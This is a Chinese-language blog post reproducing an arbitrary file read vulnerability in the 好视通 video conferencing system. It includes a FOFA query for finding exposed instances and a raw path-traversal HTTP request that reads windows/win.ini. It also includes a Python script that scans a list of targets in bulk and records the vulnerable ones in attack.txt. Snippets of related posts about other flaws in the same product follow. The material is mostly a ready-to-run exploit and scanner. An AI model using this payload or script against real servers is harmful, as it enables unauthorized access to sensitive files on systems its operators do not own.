好视通视频会议系统存在任意文件读取漏洞复现 [附POC]

最新推荐文章于 2024-03-06 13:22:53 发布
最新推荐文章于 2024-03-06 13:22:53 发布
阅读量644 收藏 8
点赞数 8
文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liyu_6618/article/details/136408657
版权

漏洞简介

好视通视频会议是由深圳市华视瑞通信息技术有限公司开发,其在国内率先推出了3G互联网视频会议,并成功应用于SAAS领域。

资产

FOFA:app="好视通-视频会议"

图片

POC

GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0

漏洞复现

使用Burp或Yakit进行发包测试

图片

批量测试

pip install requests

然后运行脚本进行测试

import requestsimport concurrent.futures
def check_vulnerability(target):    headers = {           "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",        "Content-Length":"0"       }
    try:        # print(target)        res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False)        if "extensions"in res.text and "CMCDLLNAME32" in res.text:            print(f"[+]{target}漏洞存在")            with open("attack.txt",'a') as fw:                fw.write(f"{target}\n")        else:            print(f"[-]{target}漏洞不存在")    except Exception as e:        print(f"[-]{target}访问错误")
if __name__ == "__main__":    print("------------------------")    print("微信公众号:知攻善防实验室")    print("------------------------")    print("target.txt存放目标文件")    print("attack.txt存放检测结果")    print("------------------------")    print("按回车继续")    import os    os.system("pause")    f = open("target.txt", 'r')    targets = f.read().splitlines()    print(targets)
    # 使用线程池并发执行检查漏洞    with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:        executor.map(check_vulnerability, targets)

知攻善防实验室
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 POC
失心少年
11-24 826
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!“好视通”是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 [5] ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。漏洞链接:https://127.0.0.1/register/toDownload.do?
好视通视频会议存在漏洞2021
战神/calmness的博客
11-18 3887
简介 好视通视频会议软件后台登陆处存在admin弱口令,后台可以构造url触发任意文件下载漏洞,还有xss漏洞 过程 app="好视通-视频会议“ /register/toDownload.do?fileName= 文件下载 建议 修改密码、升级软件版本 ...
好视通云会议 upLoad2.jsp 任意文件上传漏洞复现
0xSec
11-29 1191
好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,最终可获取服务器权限。
好视通视频会议平台系统漏洞复现
千寻的博客
05-21 2015
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞点fofa漏洞复现一第一步 查看登录界面第二步 使用弱口令第三步 进入系统第四步 任意文件读取摘抄 漏洞名称 弱口令 任意文件下载 漏洞编号 CNVD-2020-62437 https://www.cnvd.org.cn/flaw/show/CNVD-2020-62437 漏洞描述 好视通云会议是一款高效、便捷、低成本的网络视频会议产品,通过电脑或手机登录好视通云平台, 便可快速地与全球各地团队进行实时音视频沟通,并可同步分享各类数据文档。 好视通视频会
好视通视频会议平台存在默认口令&&任意文件下载
Fengxin的博客
11-03 1443
0x00 产品介绍 深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商,隶属于齐心集团(股票代码:002301)。 公司旗下“好视通”是国内云视频会议知名品牌,连续三年在云视频会议市场占有率第一(数据来源IDC调研报告),其应用范围主要包含:远程会议,远程教育,远程培训,远程医疗,远程招聘,应急指挥等。 0x01漏洞简介 好视通视频会议平台系统存在弱口令和任意文件下载漏洞。 0x02 Fofa语法 “深圳银澎云计算有限公司” 搜索结果如下: 0x03 漏洞复现 1、目标站点如下所示: 2、默
飞视美 视频会议系统 Struts2 远程命令执行漏洞
LiBai'S BLOG
10-10 1468
飞视美(facemeeting):facemeeting,即飞视美,隶属飞鱼星科技有限公司,坐落在四川成都,以SAAS模式提供国际标准的多媒体通讯服务,为即租即用的全新一代视频会议产品。飞视美专注提供高效、智能的视频会议解决方案,服务中小企业各类会议、协同办公等领域,通过网络进行异地实时的音视频沟通,协助中小企业构建高效、智能的统一通信系统平台。飞视美 视频会议系统存在Struts2远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
思科Webex在线视频会议软件曝命令注入漏洞
mozhe_的博客
10-29 361
两名安全研究人员于近日发布消息称,思科的WebEx在线视频会议软件受到一个严重漏洞的影响,该漏洞可以被利用来提供权限并执行任意命令。 这个安全漏洞由来自Counter Hack的Ron Bowes和Jeff McJunkin发现,并被命名为“WebExec”。为了让公众能够更加清楚地了解该漏洞,两名安全研究人员还为它专门建立了一个网站(webexec.org)。 该漏洞被追踪为CVE-2018...
tutemastev#PeiQi-WIKI-POC#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通
PeiQi0#PeiQi-WIKI-Book#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感
herewshow#poc#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通
易视通视频会议系统(PC)
08-20
“易视通”业务是山东联通向中小企业、政府机构以及个人用户提供的互联网音视频互动业务。
好视通视频会议解决方案
06-09
好视通视频会议解决方案
漏洞复现 飞视美 视频会议系统 Struts2 远程命令执行漏洞
失心少年
06-27 250
飞视美(facemeeting):facemeeting,即飞视美,隶属飞鱼星科技有限公司,坐落在四川成都,以SAAS模式提供国际标准的多媒体通讯服务,为即租即用的全新一代视频会议产品。飞视美专注提供高效、智能的视频会议解决方案,服务中小企业各类会议、协同办公等领域,通过网络进行异地实时的音视频沟通,协助中小企业构建高效、智能的统一通信系统平台。此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
好视通视频会议系统toDownload.do任意文件读取
weixin_43567873的博客
03-06 58
好视通视频会议系统toDownload.do接口处存在任意文件读取
任意文件读取漏洞复现
weixin_58954236的博客
09-02 4378
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
漏洞复现】科荣 AIO任意文件读取漏洞_04
fushuang333的博客
12-31 822
漏洞复现】科荣 AIO任意文件读取。攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1370
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【创新未发表】Matlab实现黏菌优化算法SMA-Kmean-Transformer-LSTM负荷预测算法研究.rar
最新发布
07-29
1.版本:matlab2014/2019a/2021a 2.赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值